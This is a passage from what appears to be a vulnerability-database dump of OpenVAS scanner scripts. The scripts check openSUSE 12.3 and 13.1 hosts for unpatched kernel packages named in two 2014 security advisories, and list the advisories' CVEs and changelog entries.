+0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-11 10:38:00 +0530 (Tue, 11 Feb 2014)\");\n script_cve_id(\"CVE-2013-4511\", \"CVE-2013-4563\", \"CVE-2013-4587\", \"CVE-2013-6367\",\n \"CVE-2013-6368\", \"CVE-2013-6376\", \"CVE-2013-6432\", \"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2014:0205-1)\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 13.1\");\n\n script_tag(name:\"insight\", value:\"The Linux Kernel was updated to version 3.11.10, fixing\n security issues and bugs:\n\n - floppy: bail out in open() if drive is not responding to\n block0 read (bnc#773058).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - HID: usbhid: fix sis quirk (bnc#859804).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - HID: usbhid: quirk for Synaptics Quad HD touchscreen\n (bnc#859804).\n\n - HID: usbhid: quirk for Synaptics HD touchscreen\n (bnc#859804).\n\n - HID: usbhid: merge the sis quirk (bnc#859804).\n\n - HID: hid-multitouch: add support for SiS panels\n (bnc#859804).\n\n - HID: usbhid: quirk for SiS Touchscreen (bnc#859804).\n\n - HID: usbhid: quirk for Synaptics Large Touchccreen\n (bnc#859804).\n\n - drivers: net: cpsw: fix dt probe for one port ethernet.\n\n - drivers: net: cpsw: fix for cpsw crash when build as\n modules.\n\n - dma: edma: Remove limits on number of slots.\n\n - dma: edma: Leave linked to Null slot instead of DUMMY\n slot.\n\n - dma: edma: Find missed events and issue them.\n\n - dma: edma: Write out and handle MAX_NR_SG at a given time.\n\n - dma: edma: Setup parameters to DMA MAX_NR_SG at a time.\n\n - ARM: edma: Add function to manually trigger an EDMA\n channel.\n\n - ARM: edma: Fix clearing of unused list for DT DMA\n resources.\n\n - ACPI: Add Toshiba NB100 to Vista _OSI blacklist.\n\n - ACPI: add missing win8 OSI comment to blacklist\n (bnc#856294).\n\n - ACPI: update win8 OSI blacklist.\n\n - ACPI: blacklist win8 OSI for buggy laptops.\n\n - ACPI: blacklist win8 OSI for ASUS Zenbook Prime UX31A\n (bnc#856294).\n\n - ACPI: Blacklist Win8 OSI for some HP laptop 2013 models\n (bnc#856294).\n\n - floppy: bail out in open() if drive is not responding to\n block0 read (bnc#773058).\n\n - ping: prevent NULL pointer dereference on write to\n msg_name (bnc#854175 CVE-2013-6432).\n\n - x86/dumpstack: Fix printk_address for direct addresses\n (bnc#845621).\n\n - Refresh patches.suse/stack-unwind.\n\n - Refresh patches.xen/xen-x86_64-dump-user-pgt.\n\n - KVM: x86: Convert vapic synchronization to _cached\n functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - KVM: x86: fix guest-initiated crash with x2apic\n (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - Build the KOTD against openSUSE:13.1:Update\n\n - xencons: generalize use of add_preferred_console()\n (bnc#733022, bnc#852652).\n\n - Update Xen patches to 3.11.10.\n\n - Rename patches.xen/xen-pcpu-hotplug to\n patches.xen/xen-pcpu.\n\n - KVM: x86: Fix potential divide by 0 in lapic\n (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587)\n (bnc#853050 CVE-2013-4587).\n\n - ipv6: fix he ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0205-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.11.10~7.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-02-11T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2014:0204-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7027", "CVE-2014-0038", "CVE-2013-4513", "CVE-2013-6378", "CVE-2013-4515", "CVE-2013-6431", "CVE-2013-4511", "CVE-2013-1792", "CVE-2013-6368", "CVE-2013-6367", "CVE-2013-4514", "CVE-2013-6376", "CVE-2013-6380", "CVE-2013-0343", "CVE-2013-4587", "CVE-2013-4348"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850566", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850566", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850566\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-11 10:39:05 +0530 (Tue, 11 Feb 2014)\");\n script_cve_id(\"CVE-2013-0343\", \"CVE-2013-1792\", \"CVE-2013-4348\", \"CVE-2013-4511\",\n \"CVE-2013-4513\", \"CVE-2013-4514\", \"CVE-2013-4515\", \"CVE-2013-4587\",\n \"CVE-2013-6367\", \"CVE-2013-6368\", \"CVE-2013-6376\", \"CVE-2013-6378\",\n \"CVE-2013-6380\", \"CVE-2013-6431\", \"CVE-2013-7027\", \"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2014:0204-1)\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 12.3\");\n\n script_tag(name:\"insight\", value:\"The Linux kernel was updated to fix various bugs and\n security issues:\n\n - mm/page-writeback.c: do not count anon pages as dirtyable\n memory (reclaim stalls).\n\n - mm/page-writeback.c: fix dirty_balance_reserve\n subtraction from dirtyable memory (reclaim stalls).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - net: fib: fib6_add: fix potential NULL pointer\n dereference (bnc#854173 CVE-2013-6431).\n\n - keys: fix race with concurrent install_user_keyrings()\n (bnc#808358)(CVE-2013-1792).\n\n - KVM: x86: Convert vapic synchronization to _cached\n functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - wireless: radiotap: fix parsing buffer overrun\n (bnc#854634 CVE-2013-7027).\n\n - KVM: x86: fix guest-initiated crash with x2apic\n (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - KVM: x86: Fix potential divide by 0 in lapic\n (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587)\n (bnc#853050 CVE-2013-4587).\n\n - staging: ozwpan: prevent overflow in oz_cdev_write()\n (bnc#849023 CVE-2013-4513).\n\n - perf/x86: Fix offcore_rsp valid mask for SNB/IVB\n (bnc#825006).\n\n - perf/x86: Add Intel IvyBridge event scheduling\n constraints (bnc#825006).\n\n - libertas: potential oops in debugfs (bnc#852559\n CVE-2013-6378).\n\n - aacraid: prevent invalid pointer dereference (bnc#852373\n CVE-2013-6380).\n\n - staging: wlags49_h2: buffer overflow setting station name\n (bnc#849029 CVE-2013-4514).\n\n - net: flow_dissector: fail on evil iph- ihl (bnc#848079\n CVE-2013-4348).\n\n - Staging: bcm: info leak in ioctl (bnc#849034\n CVE-2013-4515).\n\n - Refresh\n patches.fixes/net-rework-recvmsg-handler-msg_name-and-msg_na\n melen-logic.patch.\n\n - ipv6: remove max_addresses check from\n ipv6_create_tempaddr (bnc#805226, CVE-2013-0343).\n\n - net: rework recvmsg handler msg_name and msg_namelen\n logic (bnc#854722).\n\n - crypto: ansi_cprng - Fix off by one error in non-block\n size request (bnc#840226).\n\n - x6: Fix reserve_initrd so that acpi_initrd_override is\n reached (bnc#831836).\n\n - Refresh other Xen patches.\n\n - aacraid: missing capable() check in compat ioctl\n (bnc#852558).\n\n - patches.fixes/gpio-ich-fix-ichx_gpio_check_available-return.\n patch: Update upstream reference\n\n - perf/ftrace: Fix paranoid level for enabling function\n tracer (bnc#849362).\n\n - xhci: fix null pointer dereference on\n ring_doorbell_for_active_rings (bnc#848255).\n\n - xhci: Fix oops happening after address device timeout\n (bnc#848255).\n\n - xhci: Ensure a command structure points to the correct\n trb ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0204-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.3\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += 